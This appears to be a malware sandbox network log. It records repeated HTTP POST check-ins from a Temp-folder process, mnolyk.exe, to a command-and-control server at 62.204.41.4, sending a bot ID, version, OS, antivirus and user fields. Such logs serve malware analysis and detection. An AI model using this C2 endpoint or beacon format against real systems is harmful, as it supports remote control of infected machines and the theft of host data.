Feb 7, 2023 20:02:15.924236059 CET	438	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:15.988842010 CET	438	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.2.6	50021	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:16.175025940 CET	439	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:16.240391970 CET	439	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.2.6	50022	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:16.443010092 CET	440	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:16.506484032 CET	440	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49721	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:51.504070997 CET	100	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:51.568952084 CET	108	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49748	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:58.128864050 CET	135	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:58.193397999 CET	135	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.2.6	50023	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:16.679938078 CET	441	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:16.744438887 CET	441	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.2.6	50024	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:16.923135042 CET	442	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:16.985208035 CET	442	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.2.6	50025	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:17.165507078 CET	443	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:17.231359959 CET	443	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.2.6	50026	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:17.408057928 CET	444	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:17.471838951 CET	444	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.2.6	50027	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:17.657150984 CET	445	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:17.719563007 CET	445	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.2.6	50028	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:17.895695925 CET	446	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:17.959394932 CET	446	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.2.6	50029	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:18.139693022 CET	447	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:18.205637932 CET	447	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.2.6	50030	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:18.384403944 CET	448	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:18.449120998 CET	448	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.2.6	50031	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:18.637614012 CET	449	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:18.702125072 CET	449	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
309	192.168.2.6	50032	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:18.890388012 CET	450	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:18.954585075 CET	450	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49749	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:58.376847982 CET	136	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:58.441658020 CET	136	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.2.6	50033	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:19.127548933 CET	451	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:19.192739964 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.2.6	50034	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:19.362339020 CET	452	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:19.426523924 CET	452	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
312	192.168.2.6	50035	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:19.615797997 CET	453	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:19.678596020 CET	453	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.2.6	50036	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:19.847585917 CET	454	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:19.911933899 CET	454	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.2.6	50037	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:20.092570066 CET	455	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:20.157129049 CET	455	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.2.6	50038	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:20.336643934 CET	456	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
